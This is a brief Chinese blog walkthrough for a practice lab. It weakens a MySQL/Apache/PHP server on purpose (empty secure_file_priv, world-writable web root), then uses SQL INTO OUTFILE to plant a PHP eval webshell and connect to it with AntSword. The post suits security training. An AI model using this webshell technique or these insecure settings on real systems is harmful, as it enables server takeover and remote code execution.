靶场搭建
修改配置文件
vim /etc/my.cof
[mysqld]
secure_file_priv=
local-infile=1
[mysql]
local-infile=1
安装相关环境
yum install php php-mysql -y
添加配置
vim /etc/httpd/conf/httpd.conf
AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .php
重启相关服务
systemctl restart httpd
修改权限
chmod -R o+w /var/www
攻击
use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','''','mimi','''',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php';
访问 IP/ma.php
蚁剑连接
作 者:PeiyuJue
链 接: https://peiyu.serv00.net/2024/07/05/mysql靶场攻击/
来 源:Aaron的博客
版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!